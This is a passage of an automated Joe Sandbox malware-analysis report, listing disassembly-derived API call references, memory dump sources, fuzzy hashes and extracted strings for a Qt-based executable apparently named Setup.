                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$ByteSettings@@$ArrayDate$Array@@Time@@$DataData@@Stream@@String@@@$?data@Flags@Group@$Option@$?allocate@?begin?endAllocationArray@@@Data@@@@@Latin1U1@_V0@@V0@_Variant@@$?contains@?current?from?host@?remove@?set?status@?sync@ComponentDevice@@@@@Epoch@Flag@FormattingHex@Latin1@ModeOpenSecsSinceStatus@1@TimeUrl@@Url@@@@@Utc@Utf8@Valid@Value@Variant@@@Writable@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1518536464-0
                                                                                                                                                              • Opcode ID: dd5911ec83f8c74d223a9d45498f72ffd9abb335a9db8088cbe2606600a1392a
                                                                                                                                                              • Instruction ID: bc1ec550861f0cc7394665c175f36dea85e5d1d074f087bbf06e01acc3467556
                                                                                                                                                              • Opcode Fuzzy Hash: dd5911ec83f8c74d223a9d45498f72ffd9abb335a9db8088cbe2606600a1392a
                                                                                                                                                              • Instruction Fuzzy Hash: 9D8141B2B0A95285EB82DF35D8545BC2362FF84BA9F458132DE1E07664EF3CD54ACB40
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateTime@@$String@@$?fromByteQt@@@Spec@Time$?data@?index?setArray@@Array@@@Char@@Format@Latin1@String@V0@$$V0@@Valid@sscanf_s
                                                                                                                                                              • String ID: %*3s, %d %3s %d %d:%d:%d 'GMT'$dd-MMM-yy hh:mm:ss 'GMT'
                                                                                                                                                              • API String ID: 907173364-74561969
                                                                                                                                                              • Opcode ID: eabf7b3b1c3b1a63d79122048822a377c7b8e13c467e3b76212e106ebf882688
                                                                                                                                                              • Instruction ID: 564622c6e2cbb259075ee3d08cbafb73417c745def8dbfeeffe080dd249e86fc
                                                                                                                                                              • Opcode Fuzzy Hash: eabf7b3b1c3b1a63d79122048822a377c7b8e13c467e3b76212e106ebf882688
                                                                                                                                                              • Instruction Fuzzy Hash: 48515262A19A128AEB91DF31E8546FC3361FB48B9DF404132DE5E03A58EF3CD549CB40
                                                                                                                                                              APIs
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FE6
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1992FF2
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199300B
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993014
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993030
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993040
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993059
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993062
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993089
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930AB
                                                                                                                                                              • ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930B6
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930CF
                                                                                                                                                              • ??8QByteRef@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930DA
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19930EA
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993103
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199310C
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993129
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993132
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199315D
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199316E
                                                                                                                                                              • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199318D
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199319A
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931A5
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931E2
                                                                                                                                                              • ??AQByteArray@@QEAA?AVQByteRef@@H@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA19931FB
                                                                                                                                                              • ??BQByteRef@@QEBADXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993204
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199321B
                                                                                                                                                              • ?mid@QByteArray@@QEBA?AV1@HH@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993237
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993244
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA199324F
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19932FE), ref: 00007FFBA1993264
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Ref@@$Array@@$?size@String@@$?mid@DateTime@@V0@$$V0@@$?append@?clear@
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$free$malloc$?load@?utf16@E__@@ErrorInit_thread_footerLastLatin1Library@@String@@@SystemV0@@memset
                                                                                                                                                              • String ID: Advapi32$GetUserNameW$LookupAccountNameW
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$String@@$?size@$Ref@@$?qstrcmp@@DateTime@@V0@@$?clear@?mid@V0@$$$?at@?compare@CaseLongLong@Qt@@@Sensitivity@memchr
                                                                                                                                                              • String ID: ()<>@,;:\"/[]?={}
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$V0@@$A@$$$Data@@Empty@List$?at@?dispose@?lock@Data@1@@DateHash@@Locker@@MutexMutex@@Time@@Url@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$FileInfo@@$?scheme@Dir@@Formatting$?exists@ComponentEmpty@Flags@Option@$?authority@?compare@?dir@?size@CaseFile@Latin1LocalOption@2@@@@Qt@@@Sensitivity@String@String@@@Url@@@@@V0@@
                                                                                                                                                              • String ID: qrc
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
• Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
• Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListString@@$?begin@$Array@@ByteChar@@V0@@$?dispose@?index?mid@CaseChar@@@Data@1@@Latin1Qt@@@Sensitivity@$?append@?detach_grow@?end@?size@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2681142159-0
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@Byte$V0@@$?end@$?dispose@Data@1@Data@1@@$?append@?detach@?detach_grow@?realloc@?size@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1400189274-0
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Char@@String@@$?begin@?end@Latin1$?contains@CaseChar@@@Qt@@@Sensitivity@$Empty@String@@@
                                                                                                                                                              • String ID: <local>
                                                                                                                                                              • API String ID: 460053324-4266983199
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Date$Array@@Time@@$String@@$V0@@$?qstrcmp@@$?size@$Data@@ListRef@@Url@@V0@$$$?add?begin@?clear@?current?end@?host@ComponentFlags@FormattingOption@Secs@TimeUrl@@@@@Utc@V1@_Valid@memchr
                                                                                                                                                              • String ID: Strict-Transport-Security
                                                                                                                                                              • API String ID: 2136714095-1819463772
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$Array@@ByteV0@@$?end@$?dispose@Data@1@Data@1@@String@@$?append@?detach@?detach_grow@?size@Empty@U1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3847276358-0
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Char@@String@@$Ref@@String$?const$?child?parseAddressCaseChar@@@ChildEnd@Event@Event@@@Latin1Object@@Qt@@@Sensitivity@Utils@@$?chop@?clear@?contains@?data@?last?mid@?simplified@?size@Char@@1@Data@DateEmpty@IndexIp4@Ip6@String@String@@@Time@@V0@$$V0@@V2@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3059913857-0
                                                                                                                                                              • Opcode ID: 9dd76a5d1c3b4c8d624a39abfff872f2bdab0fe58cbe8e9f29a07dff51ec4340
                                                                                                                                                              • Instruction ID: e712d6786e5cf5f425f9012cdb07ddf305d42cdc6cc7ba140b881ecc317659c8
                                                                                                                                                              • Opcode Fuzzy Hash: 9dd76a5d1c3b4c8d624a39abfff872f2bdab0fe58cbe8e9f29a07dff51ec4340
                                                                                                                                                              • Instruction Fuzzy Hash: 02517F72A0AA129AEB41CB75D8441BC37B1FB14B68F444136CE1E47A94EF3CE59ACB40
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36E98
                                                                                                                                                              • ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A36EBE
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A36ED6
                                                                                                                                                              • ?addSecs@QDateTime@@QEBA?AV1@_J@Z.QT5CORE ref: 00007FFBA1A36EE7
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36EF4
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36EFE
                                                                                                                                                              • ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36F0B
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36F15
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36F43
                                                                                                                                                              • ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36FE2
                                                                                                                                                              • ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A37008
                                                                                                                                                              • ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A37020
                                                                                                                                                              • ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A3702D
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A37037
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3704A
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3706E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A3707E
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A37087
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time@@$Date$Date@@$V0@@$A@$$Logger@@MessageQt@@@Spec@Time$?add?warning@Category@@Enabled@H00@LoggingSecs@V0@$$V1@_Warning
                                                                                                                                                              • String ID: unsupported date format detected
                                                                                                                                                              • API String ID: 2883579225-1123082746
                                                                                                                                                              • Opcode ID: 8e95d7910b4aa83a9a0375aefd62b3de104e9a5e53f57d19f7e05434a61ca39e
                                                                                                                                                              • Instruction ID: 99fd0e390512babf5f629f481cdea6a1bee71e3d64cbf9cda87a0f1ab343845a
                                                                                                                                                              • Opcode Fuzzy Hash: 8e95d7910b4aa83a9a0375aefd62b3de104e9a5e53f57d19f7e05434a61ca39e
                                                                                                                                                              • Instruction Fuzzy Hash: B7C1E3B2A0899689EB46CB34D4A46BC3B71FB91B4DF448126CB5E17654EE3C974ACF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19793F5
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979403
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979444
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979454
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197946C
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979477
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979486
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979491
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794A0
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794AD
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794C8
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,?,?,?,00007FFBA197962C,?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19794D5
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197950D
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA1979524
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA1979545
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979556
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19795D6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?append@Meta$Type@@$ConverterFunction@$?register?typeName@$?ends?has?reserve@AbstractFlag@Flags@Init_thread_footerNormalizedObject@@@Private@@RegisteredString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QPair
                                                                                                                                                              • API String ID: 3686098034-1266515757
                                                                                                                                                              • Opcode ID: 258fe3c14583431596a06a15b64918aa195e569fecabf6f19ad2eccb6cf1fde0
                                                                                                                                                              • Instruction ID: 7423cb031808af4e90f632bbfd71476ad0bbbe5353d90d0711a2885a08b5c6c8
                                                                                                                                                              • Opcode Fuzzy Hash: 258fe3c14583431596a06a15b64918aa195e569fecabf6f19ad2eccb6cf1fde0
                                                                                                                                                              • Instruction Fuzzy Hash: D45110B1A0E64299E7929B30E8501B57761FF88BA4F804136DD6E476A4EF7CE449CF00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Byte$Array@@$?data@Char@@Mode@0@@ParsingVariant@@$?from?size@Array@@@DateLatin1String@@@Time@@Url@@@Utf8@V0@$$V0@@Valid@
                                                                                                                                                              • String ID: location
                                                                                                                                                              • API String ID: 3020387388-1587448267
                                                                                                                                                              • Opcode ID: 2811774e6af0c0036aedeebed4c548dd7e7140fcee784c1a54aa1b4ac10ad210
                                                                                                                                                              • Instruction ID: b2275e31404e3381ce83661412314f78907868f61a03b98ffdda37cf072ce351
                                                                                                                                                              • Opcode Fuzzy Hash: 2811774e6af0c0036aedeebed4c548dd7e7140fcee784c1a54aa1b4ac10ad210
                                                                                                                                                              • Instruction Fuzzy Hash: 64416CA2A09A0699EB419F30D8950FC2771FF5476CB805032DE1E469A8EF38D58ECB40
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CC9
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CD5
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CE7
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CF3
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21CFF
                                                                                                                                                              • ?size@QListData@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A21D0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
